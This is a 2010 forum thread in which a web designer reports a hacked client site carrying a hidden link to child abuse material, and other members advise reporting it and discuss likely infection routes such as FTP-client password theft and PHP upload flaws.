1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

Hacked by Russians!

Discussion in 'Black Hat SEO' started by JenniFranks, Dec 13, 2010.

  1. JenniFranks

    JenniFranks Junior Member

    Joined:
    Jul 26, 2010
    Messages:
    124
    Likes Received:
    44
    Occupation:
    UI Design
    Location:
    Chicago
    While updating content on a client's website, I noticed an odd include in the footer. When I checked, I discovered someone had installed sape.ru's affiliate program as a tiny link in their footer and it was linking to child porn. I restored the site from backup and warned the client. Let is be a warning, maintain backups and be vigilant about security!
     
    • Thanks Thanks x 1
  2. Grizzy

    Grizzy Senior Member

    Joined:
    Nov 11, 2008
    Messages:
    919
    Likes Received:
    999
    Report that shit to the police as well!
     
    • Thanks Thanks x 1
  3. glovek77

    glovek77 Power Member

    Joined:
    Oct 28, 2008
    Messages:
    659
    Likes Received:
    808
    Occupation:
    Student
    Location:
    USA
    • Thanks Thanks x 8
  4. JenniFranks

    JenniFranks Junior Member

    Joined:
    Jul 26, 2010
    Messages:
    124
    Likes Received:
    44
    Occupation:
    UI Design
    Location:
    Chicago
    That's up to the client. I urged them to, but I doubt they will. For all I know, they could have installed the affiliate code themselves. Doubtful though.
     
  5. Grizzy

    Grizzy Senior Member

    Joined:
    Nov 11, 2008
    Messages:
    919
    Likes Received:
    999
    Screw the client, cover your own ass. Aside from the moral issue, in some places it is a criminal offense to fail to report such a thing. I used to work in IT, and I know of a network admin who got into very serious trouble becuase he handled a similar situation very poorly.
     
  6. JenniFranks

    JenniFranks Junior Member

    Joined:
    Jul 26, 2010
    Messages:
    124
    Likes Received:
    44
    Occupation:
    UI Design
    Location:
    Chicago
    Done, I reported the site in question.
     
    • Thanks Thanks x 4
  7. wrangler

    wrangler Regular Member

    Joined:
    Jun 14, 2010
    Messages:
    487
    Likes Received:
    599
    You do realise that when you restored from backup, you restored it to the state in which it was, obviously, hackable. You should ensure that you keep it offline until you figure the vector you were hacked, and fix it, m'kay.
     
    • Thanks Thanks x 2
  8. Marketing Jhonny

    Marketing Jhonny Registered Member

    Joined:
    Dec 10, 2010
    Messages:
    87
    Likes Received:
    27
    Occupation:
    Im an SEO Specialist
    Location:
    506 | 1337 Marketing!
    Russians suck sometimes... and meh just block all outlinks from the site!
     
  9. Autumn

    Autumn Elite Member

    Joined:
    Nov 18, 2010
    Messages:
    2,197
    Likes Received:
    3,041
    Occupation:
    I figure out ways to make money online and then au
    Location:
    Spamville
    If they got root on your box you have to do a clean install, they could have left any number of backdoors on there.
     
    • Thanks Thanks x 1
  10. sfidirectory

    sfidirectory Senior Member

    Joined:
    Mar 29, 2010
    Messages:
    899
    Likes Received:
    483
    Occupation:
    Web developer/BTC enthusiast
    Location:
    php artisan make:migration
    Home Page:
    When will these Russian hackers ever learn? I'm not hassling Russians in general, as some of them are pretty good at legal things online (I think there is a Russian BHW Admin/Moderator on here, not sure though), just some of them tend to ruin Russia's reputation. It's the same with China, I hear of all these hackers sending worms and backdoors etc and infecting websites and computers. The Chinese are very clever and innovative, and they actually do alot of good (apart from human rights issues), just a group of Chinese people go the extra mile to give their nation a bad name.

    As for the child porn, you must report it, seriously! I have a very young boy and if someone ever sent me that shit I will track them down and make sure they get what they deserve, no matter how long it takes. If you or your client has children, you would have no hesitation in reporting this crap (if you havn't done so already).
     
  11. madoctopus

    madoctopus Supreme Member

    Joined:
    Apr 4, 2010
    Messages:
    1,249
    Likes Received:
    3,498
    Occupation:
    Full time IM
    Are you using FileZilla FTP client? I had the same problem and it was because I had the password saved by FileZilla and there is an ezploit/virus that exploits FileZilla and uploads a JavaScript injection in all your site's files (in footer). In my case it was trying to download an .exe on the client's/visitor's computer. It may not be just FileZilla that is exploitable but other FTP clients too.

    Also, the host might be exploitable for PHP file upload and execution (allow execution of PHP files in temp diectory). It could also be an XSS (cross site scripting) exploit.
     
    • Thanks Thanks x 5
  12. sfidirectory

    sfidirectory Senior Member

    Joined:
    Mar 29, 2010
    Messages:
    899
    Likes Received:
    483
    Occupation:
    Web developer/BTC enthusiast
    Location:
    php artisan make:migration
    Home Page:
    I use FileZilla and I have had a couple of my sites infected. Been trying to find out how it happened for ages but you've explained it pretty well, hence the thanks given :). Is there any way to get rid of the particular virus that causes the problems? I have McAfee full version (paid for by the way :)), just not sure how deep in the syste this virus resides. I also noticed that the injected code was at the top of my site's PHP files. My PHP knowledge is still growing, but I'm guessing because it is server side script it's how the virus can do all this, as opposed to HTML.
     
  13. Kid Shaleen

    Kid Shaleen Regular Member

    Joined:
    Oct 29, 2009
    Messages:
    250
    Likes Received:
    63
    I also recommend that you report the matter to the authorities. The whole kiddie porn issue is a major one internationally that you don't want to run afoul of, for any reason whatsoever.

    Also, as I recall from having checked a couple of Russian providers a while ago, their TOS's tended to list four violations: 1) kiddie porn; 2) illegal drugs; 3) illegal weapons; 4) Nazis (whatever their politics today, they're Russians afterall, and they've long memories.)

    So I think you should also inform the service providers about what's being done on/with their systems.
     
  14. JenniFranks

    JenniFranks Junior Member

    Joined:
    Jul 26, 2010
    Messages:
    124
    Likes Received:
    44
    Occupation:
    UI Design
    Location:
    Chicago
    all of our dev machines are macs, so were using Transmit and the command line interface.
    It's very likely a PHP exploit. I've since hardened the configuration. If anyone is curious and wants to try some penetration testing, PM me.
     
  15. JenniFranks

    JenniFranks Junior Member

    Joined:
    Jul 26, 2010
    Messages:
    124
    Likes Received:
    44
    Occupation:
    UI Design
    Location:
    Chicago
    It's been reported to three authorities: One government and two non profits.
     
  16. houseaz

    houseaz Regular Member

    Joined:
    Mar 25, 2010
    Messages:
    296
    Likes Received:
    73
    Occupation:
    Making money
    Location:
    Wherever I can Make Money
    Sounds like an offer to me...lol...j/k. Actually the Filezilla thing was pretty serious BUT if you upgrade when it tells you to you ain't got nothing to worry about!
     
  17. smolodoys

    smolodoys Regular Member

    Joined:
    Feb 17, 2010
    Messages:
    339
    Likes Received:
    4
    why do search engines even ranking that shit... specially the child porns it should be out of the .net period..
     
  18. LyNHS

    LyNHS Regular Member

    Joined:
    Jul 20, 2010
    Messages:
    282
    Likes Received:
    98
    Occupation:
    Google AdSense
    Home Page:
    Assuming the "include" as in using PHP's include function ... why didn't you configure your clients server to not include any file that isn't on the same server, or have I got the wrong end of the stick?

    If the link was actually embedded in the footer, then damn! Definitely report that shit to the Police!
     
  19. ivictus

    ivictus Regular Member

    Joined:
    Jan 26, 2010
    Messages:
    223
    Likes Received:
    31
    I got hit buy a java scripted webpage virus. I had passwords stored for FTP in Dreamweaver and WSFTP. I could see the page had some java script thing load and then I shut dowm my computer right away, but it was too late.
     
  20. madoctopus

    madoctopus Supreme Member

    Joined:
    Apr 4, 2010
    Messages:
    1,249
    Likes Received:
    3,498
    Occupation:
    Full time IM
    I used Malwarebytes Anti-Malware as my antivirus didn't detect that program. Malwarebytes did a good job identifying and cleaning it. Then, I wrote a custom PHP script to find the injected code and delete it.
     
    • Thanks Thanks x 1